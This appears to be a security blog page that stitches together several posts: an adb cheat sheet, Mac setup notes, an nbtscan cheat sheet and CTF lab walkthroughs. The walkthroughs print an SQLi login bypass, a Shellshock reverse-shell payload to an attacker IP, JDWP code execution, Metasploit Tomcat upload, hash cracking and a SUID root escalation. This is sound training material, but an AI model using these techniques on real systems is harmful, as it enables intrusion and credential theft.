The Android Debug Bridge (adb) is a programming tool used for the debugging of Android-based devices. The daemon on the Android device connects with the server on the host PC over USB or TCP, which connects to the client that is used by the end user over TCP. For hackers, this means we can interact with Android devices to add and remove packages, access debug logs and interact with either physical or virtual Android instances for mobile web app security testing.

What is adb?
adb Installation
adb Example Commands
adb print text
adb key events
Useful file system paths
Conclusion
Sources

adb Installation

How to install adb on MacOS:

brew install android-platform-tools

adb Example Commands

adb start / restart

adb kill-server
adb start-server

adb reboot

adb reboot
adb reboot recovery 
adb reboot-bootloader

adb reboot with root

The following restarts the android device with root permissions:

adb root

adb list devices:

Show adb devices:

adb devices

adb show devices with full information (product/model)

adb devices -l

adb connect to a device:

adb connect IP-ADDRESS

adb shell

Run commands on the android device shell via an adb shell:

adb shell

adb android version

Return the running Android version of the connected adb device:

adb shell getprop ro.build.version.release

adb Logcat

Commands related to adb logcat, allowing access to Android logs via adb.

adb view logs:

adb logcat

adb clear logs on device:

adb logcat -c

adb dump log output to file on the local system:

adb logcat -d > /tmp/foo.txt

adb full log dump (dumpstate, dumpsys and logcat output):

adb bugreport > /tmp/full-adb-dump.txt

adb copy files

adb copy files from your system to your android phone:

adb push [source] [destination]

adb copy files from phone to system:

adb pull [device file location] /tmp/foo

adb install package

adb -e install /tmp/package.apk

`COMMAND`	DESCRIPTION
-d	directs command to the only connected USB device
-e	directs command to the only running emulator
-s	serial number
-p	product name or path

Note the flag needs to come before the command.

Uninstalling app with adb

COMMAND	DESCRIPTION
adb uninstall com.myAppPackage	Uninstalls the app with the package name com.myAppPackage.
adb uninstall <app .apk name>	Uninstalls the app with the specified .apk file name.
adb uninstall -k <app .apk name>	Uninstalls the .apk file without deleting its data.

adb update app

COMMAND	DESCRIPTION
adb install -r app-name.apk	reinstall the app and keep its data on the device
adb install –k app-name.apk /local/path/	Installs the app and retains its data without deleting it

adb home button press

adb shell am start -W -c android.intent.category.HOME -a android.intent.action.MAIN

adb take screenshot

adb shell screencap -p /sdcard/screenshot.png

adb screen record

adb shell screenrecord /sdcard/NotAbleToLogin.mp4

ShPref

replace org.example.app with your application id

adb restart app

adb shell 'am broadcast -a org.foo.app.sp.CLEAR --ez restart true'

adb emulate device

How to emulate device in adb:

adb shell wm size 2048x1536
adb shell wm density 288

adb reset to default:

adb shell wm size reset
adb shell wm density reset

adb print text

Potentially useful for input validation based attacks:

adb shell input text 'payload'

adb key events

COMMAND	DESCRIPTION
`adb shell input keyevent 3`	home btn
`adb shell input keyevent 4`	back btn
`adb shell input keyevent 5`	call
`adb shell input keyevent 6`	end call
`adb shell input keyevent 26`	turn android device on and off. it will toggle device to on/off status.
`adb shell input keyevent 27`	camera
`adb shell input keyevent 64`	open browser
`adb shell input keyevent 66`	enter
`adb shell input keyevent 67`	delete (backspace)
`adb shell input keyevent 207`	contacts
`adb shell input keyevent 220 / 221`	brightness down/up
`adb shell input keyevent 277 / 278 / 279`	cut/copy/paste

Useful file system paths

`PATH`	DESCRIPTION
/data/data/<package>/databases	App databases
/data/data/<package>/shared_prefs/	Shared preferences
/data/app	APK installed by user
/system/app	Pre-installed APK files
/mmt/asec	Encrypted apps (App2SD)
/mmt/emmc	Internal SD Card
/mmt/adcard	External/Internal SD Card
/mmt/adcard/external_sd	External SD Card

adb show device information

COMMAND	DESCRIPTION
adb get-state	Print device state
adb get-serialno	Get the serial number
adb shell dumpsys iphonesybinfo	Get the IMEI
adb shell netstat	List TCP connectivity
adb shell pwd	Print current working directory
adb shell dumpsys battery	Battery status
adb shell pm list features	List phone features
adb shell service list	List all services
adb shell dumpsys activity <package>/<activity>	Activity info
adb shell ps	Print process status
adb shell wm size	Displays the current screen resolution
dumpsys window windows \| grep -E 'mCurrentFocus\|mFocusedApp'	Print current app's opened activity

adb show package info

COMMAND	DESCRIPTION
adb shell list packages	List package names
adb shell list packages -r	List package name + path to APKs
adb shell list packages -3	List third-party package names
adb shell list packages -s	List only system packages
adb shell list packages -u	List package names + uninstalled
adb shell dumpsys package packages	List info on all apps
adb shell dump <name>	List info on one package
adb shell path <package>	Path to the APK file

adb system settings

e.g., adjust battery level, resolution etc

COMMAND	DESCRIPTION
adb shell dumpsys battery set level <n>	Change the battery level from 0 to 100
adb shell dumpsys battery set status <n>	Change the battery status to unknown, charging, discharging, not charging, or full
adb shell dumpsys battery reset	Reset the battery
adb shell dumpsys battery set usb <n>	Change the status of USB connection to ON or OFF
adb shell wm size WxH	Sets the resolution to WxH

adb device commands

COMMAND	DESCRIPTION
adb reboot-recovery	Reboot device into recovery mode
adb reboot fastboot	Reboot device into fastboot mode
adb shell screencap -p "/tmp/screenshot.png"	Capture screenshot
adb shell screenrecord "/tmp/record.mp4"	Record device screen
adb backup -apk -all -f backup.ab	Backup settings and apps
adb backup -apk -shared -all -f backup.ab	Backup settings, apps, and shared storage
adb backup -apk -nosystem -all -f backup.ab	Backup only non-system apps
adb restore backup.ab	Restore a previous backup
adb shell am start\|startservice\|broadcast <INTENT>[<COMPONENT>] -a <ACTION>	Start activity intent
adb shell am start -a android.intent.action.VIEW -d URL	Open URL
adb shell am start -t image/* -a android.intent.action.VIEW	Opens gallery

adb backup

adb backup -f chrome.ab -apk com.android.chromer device

Conclusion

We hope this ADB cheat sheet was useful in covering the usage of the ADB tool for performing mobile app security testing against Android Apps.

Sources

MacBook - Post Install Config + Apps

Dhruv Ambaliya — Sat, 06 Apr 2024 01:04:18 +0000

Just for fun, here is my list of post install config changes plus list of apps I install after installing  Mac OS X 

##Side Dock

Open: System Preferences > Dock click Left.

##Enable Right Click MacBook Trackpad

Open: System Preferences > Trackpad click click in bottom right corner under Secondary Click.

##Enable path view in finder

Open Finder View > Show Path Bar

The path will render at the bottom of the Finder window.

##Create symlink for /Volumes

ln -s /Volumes/ ~/Desktop/Volumes/

If I don’t do this, my cifs mounts show as a single drive - if you have none browsable cifs mounts then this can become a pain.

##Mount smb / cifs share in OSX

Open Finder, press CMD+k and enter the path of your smb smb:// or cifs cifs:// server.

Finder show file extensions

Show file extensions on Mac OS X, open Finder: Preferences > Advanced tick Show all filename extensions, I also untick Show warnnig before changing an extension

##Delete junk from dock

Delete all unused apps / icons from dock.

##Increase Terminal Font Size

Terminal > Preferences > Text adjust font size.

##Install Brew

Setup home brew

ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

Install command line tools when prompted.

Setup Jekyll

###Install RVM

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
\curl -sSL https://get.rvm.io | bash -s stable

###Install Jekyll

gem install jekyll

###Trouble Shooting Jekyll Install

you don’t have write permissions for the /library/ruby/gems/2.0.0 directory. mac

Close and reopen terminal, re-run gem install jekyll - the gems should build fine, DO NOT USE sudo.

cd into your jekyll dir and run “jekyll serve”

Install the following via brew:

nmap vim netcat git

Copy .ssh back over for ssh keys.

Install Apps

List of Apps I use.

Evernote
Disk Inventory X (for when du -h doesn’t cut it)
Home Brew - It’s self contained, easy to null should you need to.
VLC
Wireshark
uTorrent
MS Office for Mac
Google Drive
Alfred 2
The Unarchiver
Xcode
iTerm
OSX Command Line Tools
MacVim
Reader 2 - RSS reader + feedly
Quassel Client - IRC
Skype
Spotify
Firefox
Chrome
Airmail 2
VMWare Fusion
KeePassX
Caffeine
Trim Enabler (only needed for after market SSD’s)
iStat Menus 5
Battery Logger

Swap spotlight for Alfred - shortcut key.

First go to Settings > Spotlight and untick “Spotlight search keyboard shortcut: CMD + SPACE”

Open Alfred and change it to CMD+SPACE

Disable “Automatically rearrange Spaces”

This drives me insane, System Preferences > Mission Control untick Automatically rearrange Spaces based on recent use

Change OSX Screenshot Location

defaults write com.apple.screencapture location ~/Pictures/Screenshots

killall SystemUIServer

When using an aftermarket SSD, I used Trim Enabler

Warning turns off text security setting for ktexts.

Ktext signing works by checking if all the drivers in the system are unaltered by a third party, or approved by Apple. If they have been modified, Yosemite will no longer load the driver.

Disable Sudden Motion Sensor - SMS

Again if you have an Apple SSD, skip this.

sudo pmset -a sms 0

confirm with:

pmset -g

Disable sleep image

sudo rm /private/var/vm/sleepimage
sudo pmset -a hibernatemode 0 
pmset -g | grep hibernatemode

All I can think of for now…

LAMP Security CTF7 - Walkthrough

Dhruv Ambaliya — Tue, 02 Apr 2024 20:00:30 +0000

Difficulty Rating:

Author Description
Enumeration
- Host Service Enumeration
Web Application Enumeration
Web Application on Port 8080
Local Enumeration
- MySQL
- Hashcat md5 cracking
  - Cracked MD5 Hashes
Local Privilege Escalation

Author Description

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products.

Author: madirish2600

Download: VulnHub

Enumeration

nmap -v -p 1-65535 -sV -O -sT 192.168.30.134

Dislcaimer: Multiple Entry Points

The LAMPSecurity series is not particularly challenging, for each VM in the series I've targeted the web application as the entry point.

Host Service Enumeration

Port	Service	Version Detection
`TCP: 22`	SSH	OpenSSH 5.3 (protocol 2.0)
`TCP: 80`	HTTP	Apache httpd 2.2.15 ((CentOS))
`TCP: 139`	Samba	Samba smbd 3.X (workgroup: MYGROUP)
`TCP: 901`	HTTP	Samba SWAT administration server
`TCP: 8080`	HTTP	Apache httpd 2.2.15 ((CentOS))
`TCP: 10000`	Webmin	(Webmin httpd)

Web Application Enumeration

Host enumeration discovered two web application, one on port 80 and one on port 8080, as with the previous CTF series VM’s, other entry points are ignored and the web application is used for the entry point.

Web Application on Port 8080

Inspection of the web application revealed it’s vulnerable to an SQLi authentication bypass. By Entering ' or 1=1 -- . in the username field an attacker can successfully login as admin.

Admin account:

PHP Shell Upload

With admin access to the web application it was possible to upload a reverse shell.

Execution of the php shell was not possible via the web application directly.

Dirbuster

Dirbuster disclosed the location of the file uploads directory /assets/.

Reverse Shell

Executing the php script resulted in a reverse shell as the user apache:

[root:~]# nc -n -v -l -p 443
listening on [any] 443 ...
connect to [192.168.221.134] from (UNKNOWN) [192.168.221.133] 58599
Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC
2012 i686 i686 i386 GNU/Linux
01:12:47 up  2:37,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.1$

Local Enumeration

Local enumeration discovered mysql root account could be accessed locally without a password:

mysql -u root  and no password worked as the apache user.

MySQL

mysql> select username, password from users;
select username, password from users;
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+
| username
| password                         |
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------------------+
| brian@localhost.localdomain
| 4cb9c8a8048fd02294477fcb1a41191a |
| john@localhost.localdomain
| 0d9ff2a4396d6939f80ffe09b1280ee1 |
| alice@localhost.localdomain
| 2146bf95e8929874fc63d54f50f1d2e3 |
| ruby@localhost.localdomain
| 9f80ec37f8313728ef3e2f218c79aa23 |
| leon@localhost.localdomain
| 5d93ceb70e2bf5daa84ec3d0cd2c731a |
| julia@localhost.localdomain
| ed2539fe892d2c52c42a440354e8e3d5 |
| michael@localhost.localdomain
| 9c42a1346e333a770904b2a2b37fa7d3 |
| bruce@localhost.localdomain
| 3a24d81c2b9d0d9aaf2f10c6c9757d4e |
| neil@localhost.localdomain
| 4773408d5358875b3764db552a29ca61 |

Hashcat md5 cracking

The hashes were placed in a text file using the following format:

brian@localhost.localdomain:4cb9c8a8048fd02294477fcb1a41191a
john@localhost.localdomain:0d9ff2a4396d6939f80ffe09b1280ee1
alice@localhost.localdomain:2146bf95e8929874fc63d54f50f1d2e3
ruby@localhost.localdomain:9f80ec37f8313728ef3e2f218c79aa23
leon@localhost.localdomain:5d93ceb70e2bf5daa84ec3d0cd2c731a
julia@localhost.localdomain:ed2539fe892d2c52c42a440354e8e3d5
michael@localhost.localdomai:9c42a1346e333a770904b2a2b37fa7d3
bruce@localhost.localdomai:3a24d81c2b9d0d9aaf2f10c6c9757d4e
neil@localhost.localdomain:4773408d5358875b3764db552a29ca61
charles@localhost.localdomai:b2a97bcecbd9336b98d59d9324dae5cf

NOTE: In order for hashcat to ignore usernames in a hash input file you need to specify --username

[root:~]# hashcat --username -m 0 -a 0 crack-ctf7.txt
/usr/share/wordlists/rockyou.txt

Cracked MD5 Hashes

ed2539fe892d2c52c42a440354e8e3d5:madrid
4cb9c8a8048fd02294477fcb1a41191a:changeme
5d93ceb70e2bf5daa84ec3d0cd2c731a:qwer1234
2146bf95e8929874fc63d54f50f1d2e3:turtles77
9c42a1346e333a770904b2a2b37fa7d3:somepassword
b2a97bcecbd9336b98d59d9324dae5cf:chuck33

Local Privilege Escalation

The julia account was able to su to root.

bash-4.1$ su - julia
su - julia
Password: madrid

[julia@localhost ~]$ sudo -s
sudo -s
[sudo] password for julia: madrid

[root@localhost julia]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:httpd_t:s0
[root@localhost julia]#

Thanks for the VM :)

Pen Testers Lab: Shellshock CVE-2014-6271 - Walkthrough

Dhruv Ambaliya — Sat, 30 Mar 2024 10:00:10 +0000

Difficulty Rating:

Author Description
Host Enumeration
- Port Scanning
- Service Enumeration
Website Inspection
Burp Suite - Send Reverse Shellshock
Reverse Shell

Author Description

This course details the exploitation of the vulnerability CVE-2014-6271 AKA Shellshock. This vulnerability impacts the Bourne Again Shell “Bash”. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.

Author: PentesterLab

Download: VulnHub

This is not a challenge VM

This VM is part of the exercises provided by PenTestersLab.com, it's not a challenge VM (there is no flag to capture).

Host Enumeration

Port Scanning

nmap -v -p 1-65535 -sV -O -sT 192.168.221.144

Service Enumeration

Port	Service	Version Detection
`TCP: 22`	SSH	OpenSSH 6.0 (protocol 2.0)
`TCP: 80`	HTTP	Apache httpd 2.2.21 ((Unix) DAV/2)

Website Inspection

Inspection of Squid using the metasploit module auxiliary/scanner/http/squid_pivot_scanning discovered port 80 was exposed via the proxy.

Burp Suite - Send Reverse Shellshock

Burp Suite was used to manipulate the User Agent: and deliver the following payload:

() { ignored;};/bin/bash -i >& /dev/tcp/192.168.221.139/443 0>&1

Reverse Shell

Successfully connecting to the listening netcat instance:

[root:~]# nc.traditional -lp 443 -vvv
listening on [any] 443 ...
192.168.221.144: inverse host lookup failed: Unknown host
connect to [192.168.221.139] from (UNKNOWN) [192.168.221.144] 44254
bash: no job control in this shell
bash-4.2$ id
id
uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab)

End of exercise.

Thanks for the VM :)

nbtscan Cheat Sheet

Dhruv Ambaliya — Fri, 29 Mar 2024 14:37:10 +0000

nbtscan is a command line tool that finds exposed NETBIOS nameservers, it’s a good first step for finding open shares.

Don't use the version of nbtscan that ships with KALI

Grab nbtscan from the above link and build it from source, this version tends to find more information

Compile nbtscan on KALI

root@kali:~/nbtscan# wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgz
root@kali:~/nbtscan# tar -xvzf nbtscan-source-1.0.35.tgz
root@kali:~/nbtscan# make
root@kali:~/nbtscan# ./nbtscan
nbtscan 1.0.35 - 2008-04-08 - http://www.unixwiz.net/tools/

usage: ./nbtscan [options] target [targets...]

   Targets are lists of IP addresses, DNS names, or address
   ranges. Ranges can be in /nbits notation ("192.168.12.0/24")
   or with a range in the last octet ("192.168.12.64-97")

nbtscan Cheat Sheet

Command	Description
`nbtscan -v`	Displays the nbtscan version
`nbtscan -f target(s)`	This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
`nbtscan -O file-name.txt target(s)`	Sends output to a file
`nbtscan -H`	Generate an HTTP header
`nbtscan -P`	Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
`nbtscan -V`	Enable verbose mode
`nbtscan -n`	Turns off this inverse name lookup, for hanging resolution
`nbtscan -p PORT target(s)`	This allows specification of a UDP port number to be used as the source in sending a query
`nbtscan -m`	Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

/dev/random: Sleepy Walkthrough CTF

Dhruv Ambaliya — Tue, 26 Mar 2024 21:12:52 +0000

Difficulty Rating:

Description
- JServ Enumeration
- JDWP Enumeration
Apache Tomcat JServ Proxy setup
- Apache Tomcat Proxy Setup Script
Remote Exploitation
- Meterpreter Shell
Local Privilege Escalation

Description

Sleepy is part of the /dev/random: series created by Sagi-, it’s a little more difficult than Pipe depending on your skill set.

Author: @s4gi_

Download: /dev/random: Sleepy via @VulnHub

_________.__                              
/   _____/|  |   ____   ____ ______ ___.__.
\_____  \ |  | _/ __ \_/ __ \\____ <   |  |
/        \|  |_\  ___/\  ___/|  |_> >___  |
/_______  /|____/\___  >\___  >   __// ____| ·VM·
      \/           \/     \/|__|   \/

##Enumeration

[root:~]# nmap -v -p 1-65535 -sV -O -sT 192.168.30.146

PORT     STATE SERVICE REASON  VERSION
21/tcp   open  ftp     syn-ack vsftpd 2.0.8 or later
8009/tcp open  ajp13   syn-ack Apache Jserv (Protocol v1.3)
9001/tcp open  jdwp    syn-ack Java Debug Wire Protocol (Reference Implementation) version 1.6 1.7.0_71
MAC Address: 00:0C:29:8C:41:F7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Uptime guess: 49.709 days (since Wed Oct  7 20:28:44 2015)

###Service Enumeration

Port	Service	Version Detection
`TCP: 21`	FTP	vsftpd 2.0.8 or later
`TCP: 8009`	ajp13	Apache Jserv (Protocol v1.3)
`TCP: 9001`	jdwp	Java Debug Wire Protocol version 1.6 1.7.0_71

###FTP Enumeration

As nmap indicated, FTP had anonymous access enabled. Interrogation of the service revealed /pub/sleepy.png

JServ Enumeration

JServ protocol is exposed with no web server proxy, JServ acts as a proxy and requires a web server to proxy it’s requests.

JDWP Enumeration

Unauthenticated JDWP is exposed:

[root]# jdb -attach 192.168.30.146:9001

Research indicated it was possible to interrupt threads, with the command: interupt allowing for arbitrary code execution.

JDWP Commands

Type help for a list of JDWP commands.

[root]# jdb -attach 192.168.30.146:9001                                                                                                                                                 
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
> threads
Group system:
  (java.lang.ref.Reference$ReferenceHandler)0x19d Reference Handler cond. waiting
  (java.lang.ref.Finalizer$FinalizerThread)0x19e  Finalizer         cond. waiting
  (java.lang.Thread)0x19f                         Signal Dispatcher running
Group main:
  (java.lang.Thread)0x1a1                         main              sleeping
> interrupt 0x1a1
>
Exception occurred: java.lang.InterruptedException (uncaught)"thread=main", java.lang.Thread.sleep(), line=-1 bci=-1

main[1] print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("cp /etc/tomcat/tomcat-users.xml /var/ftp/pub/").getInputStream())).readLine())
java.lang.NullPointerException
	at com.sun.tools.example.debug.expr.LValue.argumentsMatch(LValue.java:268)
	at com.sun.tools.example.debug.expr.LValue.resolveOverload(LValue.java:399)
	at com.sun.tools.example.debug.expr.LValue.makeNewObject(LValue.java:820)
	at com.sun.tools.example.debug.expr.ExpressionParser.AllocationExpression(ExpressionParser.java:1119)
	at com.sun.tools.example.debug.expr.ExpressionParser.PrimaryPrefix(ExpressionParser.java:961)
	at com.sun.tools.example.debug.expr.ExpressionParser.PrimaryExpression(ExpressionParser.java:909)
	at com.sun.tools.example.debug.expr.ExpressionParser.PostfixExpression(ExpressionParser.java:834)
	at com.sun.tools.example.debug.expr.ExpressionParser.UnaryExpressionNotPlusMinus(ExpressionParser.java:757)
	at com.sun.tools.example.debug.expr.ExpressionParser.UnaryExpression(ExpressionParser.java:687)
	at com.sun.tools.example.debug.expr.ExpressionParser.MultiplicativeExpression(ExpressionParser.java:611)
	at com.sun.tools.example.debug.expr.ExpressionParser.AdditiveExpression(ExpressionParser.java:580)
	at com.sun.tools.example.debug.expr.ExpressionParser.ShiftExpression(ExpressionParser.java:542)
	at com.sun.tools.example.debug.expr.ExpressionParser.RelationalExpression(ExpressionParser.java:504)
	at com.sun.tools.example.debug.expr.ExpressionParser.InstanceOfExpression(ExpressionParser.java:485)
	at com.sun.tools.example.debug.expr.ExpressionParser.EqualityExpression(ExpressionParser.java:455)
	at com.sun.tools.example.debug.expr.ExpressionParser.AndExpression(ExpressionParser.java:433)
	at com.sun.tools.example.debug.expr.ExpressionParser.ExclusiveOrExpression(ExpressionParser.java:412)
	at com.sun.tools.example.debug.expr.ExpressionParser.InclusiveOrExpression(ExpressionParser.java:391)
	at com.sun.tools.example.debug.expr.ExpressionParser.ConditionalAndExpression(ExpressionParser.java:370)
	at com.sun.tools.example.debug.expr.ExpressionParser.ConditionalOrExpression(ExpressionParser.java:349)
	at com.sun.tools.example.debug.expr.ExpressionParser.ConditionalExpression(ExpressionParser.java:321)
	at com.sun.tools.example.debug.expr.ExpressionParser.Expression(ExpressionParser.java:256)
	at com.sun.tools.example.debug.expr.ExpressionParser.evaluate(ExpressionParser.java:81)
	at com.sun.tools.example.debug.tty.Commands.evaluate(Commands.java:114)
	at com.sun.tools.example.debug.tty.Commands.doPrint(Commands.java:1654)
	at com.sun.tools.example.debug.tty.Commands$3.action(Commands.java:1680)
	at com.sun.tools.example.debug.tty.Commands$AsyncExecution$1.run(Commands.java:66)
 new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("cp /etc/tomcat/tomcat-users.xml /var/ftp/pub/").getInputStream())).readLine()) = null
main[1] exit

The Java code above copied the /etc/tomcat/tomcat-users.xml file to /var/ftp/pub. The default location for pub ftp on CentOS.

tomcat-users.xml was download to the attacking machine and the following credentials were extracted:

Username	Password
`sl33py`	`Gu3SSmYStR0NgPa$sw0rD!`

Full tomcat-users.xml file for completeness:

<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users>
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary.
-->
<!--
  NOTE:  The sample user and role entries below are wrapped in a comment
  and thus are ignored when reading this file. Do not forget to remove
  <!.. ..> that surrounds them.
-->
  <role rolename="tomcat"/>
  <role rolename="role1"/>
 <!-- <user username="tomcat" password="tomcat" roles="tomcat,manager-gui,admin,manager-jmx,admin-gui,admin-script,manager,manager-script,manager-status"/> -->
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>

<role rolename="admin"/>
 <role rolename="admin-gui"/>
 <role rolename="admin-script"/>
 <role rolename="manager"/>
<role rolename="manager-gui"/>
 <role rolename="manager-script"/>
<role rolename="manager-jmx"/>
 <role rolename="manager-status"/>
<!-- <user name="admin" password="adminadmin" roles="admin,manager,admin-gui,admin-script,manager-gui,manager-script,manager-jmx,manager-status" /> -->


<user username="sl33py" password="Gu3SSmYStR0NgPa$sw0rD!" roles="tomcat,manager-gui,admin-gui,admin,manager-jmx,admin-script,manager,manager-script,manager-status"/>

</tomcat-users>

Apache Tomcat JServ Proxy setup

During enumeration JServ protocol was discovered exposed on the default port TCP: 8009. A local Apache proxy was setup on the attacking machine proxying requests back to the target JServ application server.

Apache Tomcat Proxy Setup Script

Script for automation of JServ Proxy on Attacking machine:

#!/bin/bash
    apt-get install libapache2-mod-jk -y
    sed -i 's#JkWorkersFile /etc/libapache2-mod-jk/workers.properties#JkWorkersFile /etc/apache2/workers.properties#g' /etc/apache2/mods-enabled/jk.conf
    cp /etc/libapache2-mod-jk/workers.properties /etc/apache2/
    sed -i 's#worker.ajp13_worker.host=localhost#worker.ajp13_worker.host=192.168.30.146#g' /etc/apache2/workers.properties
    sed  '/\Host\>/i JKMount /* ajp13_worker' /etc/apache2/sites-enabled/000-default.conf
    a2enmod proxy_http proxy_ajp
    service apache2 restart

Tomcat should be exposed when visiting http://127.0.0.1 in Firefox.

Remote Exploitation

Tomcat is now exposed and login credentials have been obtained, it’s now possible to login via Tomcat Manager and leverage a shell via Metasploit.

FingerprintCheck

The option: set FingerprintCheck false needs to be configured or meterpreter will throw the following error:

[-] [2015.11.26-13:17:44] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2.4.10 (Debian)" does not match "(?-mix:Apache.*(Coy ote|Tomcat))", use 'set FingerprintCheck false' to disable this check.

msf exploit(tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name       Current Setting         Required  Description
   ----       ---------------         --------  -----------
   PASSWORD   Gu3SSmYStR0NgPa$sw0rD!  no        The password for the specified username
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      0.0.0.0                 yes       The target address
   RPORT      80                      yes       The target port
   TARGETURI  /manager                yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   USERNAME   sl33py                  no        The username to authenticate as
   VHOST                              no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.30.134   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal

Meterpreter Shell

An unprivileged meterpreter shell was obtained:

Local Privilege Escalation

Enumeration

Searching for SUID files discovered a binary called nightmare.

bash-4.2$ find / -user root -perm -4000 -print 2> /dev/null
find / -user root -perm -4000 -print 2> /dev/null
/usr/bin/mount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/umount
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/nightmare
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib64/dbus-1/dbus-daemon-launch-helper

Binary Interrogation

The nightmare binary was copied to the attacking machine and interrogated with strings.

The binary nightmare appears to execute /user/bin/sl as the root user (SUID is on the execute bit).

Bash Function Manipulation

Function manipulation was leveraged to execute /bin/sh by the nightmare binary, providing a root shell thus fully compromising the system.

Nightmare Process

After execution of /usr/bin/nightmare it was necessary to kill the nightmare process using kill -2 via another shell in order for the root shell to spawn correctly. To search for the process use ps aux | grep nightmare and use kill -2 command to kill the pid.

meterpreter > shell
Process 11 created.
Channel 14 created.


python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$

bash-4.2$

bash-4.2$ function /usr/bin/sl() { /bin/sh; }
function /usr/bin/sl() { /bin/sh; }
bash-4.2$ export -f /usr/bin/sl
export -f /usr/bin/sl
bash-4.2$ /usr/bin/nightmare
/usr/bin/nightmare
Error opening terminal: unknown.
[+] Again [y/n]? sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root),91(tomcat) context=system_u:system_r:tomcat_t:s0
sh-4.2# cat /root/flag.txt
cat /root/flag.txt
Well done!

Here's your flag: 3eb030c6ab099b0a355712fe38d59ffb

Root Flag

Thanks for the VM :)

SkyTower - Walkthrough

Dhruv Ambaliya — Wed, 20 Mar 2024 15:00:59 +0000

Difficulty Rating:

Author Description
Enumeration
- Host Service Enumeration
Web Application Analysis
HTTP Proxy SSH Connection
Local Enumeration
MySQL Credentials
Privilege Escalation - Password Reuse
- Getting root:
Conclusion

Author Description

This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town). The aim is to test intermediate to advanced security enthusiasts in their ability to attack a system using a multi-faceted approach and obtain the “flag”.

You will require skills across different facets of system and application vulnerabilities, as well as an understanding of various services and how to attack them. Most of all, your logical thinking and methodical approach to penetration testing will come into play to allow you to successfully attack this system. Try different variations and approaches. You will most likely find that automated tools will not assist you.

Author: Telspace Systems

Download: VulnHub

Enumeration

nmap -v -p 1-65535 -sV -O -sT 10.0.1.114

Host Service Enumeration

</tr>

Port	Service	Version Detection
`TCP: 80`	HTTP	Apache httpd 2.2.22 ((Debian))
`TCP: 3128`	http-proxy	Squid http proxy 3.1.20

Web Application Analysis

The basic test below indicated the web application could be vulnerable to SQL injection.

SQL Injection looked possible + DB identified as MySQL:

Enumeration indicated the web application was filtering the SQLi attempts and removing some characters, such as OR. This was overcome (after researching for SQLi filtering evasion) using the following:

With no direct access to SSH the above credentials could not be leveraged to gain a Shell.

HTTP Proxy SSH Connection

The following was used to gain access to the SSH server by proxying the connection through the open SQUID server on the target machine.

Setup tunnel with proxytunnel:

[root:~]# proxytunnel -p 10.0.1.114:3128 -d 127.0.0.1:22 -a 4444

SSH through the HTTP tunnel:

[root:~]# ssh john@127.0.0.1 -p 4444  "/bin/sh"
john@127.0.0.1's password:

id
uid=1000(john) gid=1000(john) groups=1000(john)

/bin/sh needed to be postfixed to the end of the SSH command, as the server appeared to kick connections upon connection.

Local Enumeration

Enumeration as the user John discovered the MySQL root credentials:

$ cat login.php
<?php

$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

MySQL Credentials

The following process was used to disclosed the users credentials:

$ mysql -u root -p
Enter password: root
show databases;


\q
Database
information_schema
SkyTech
mysql
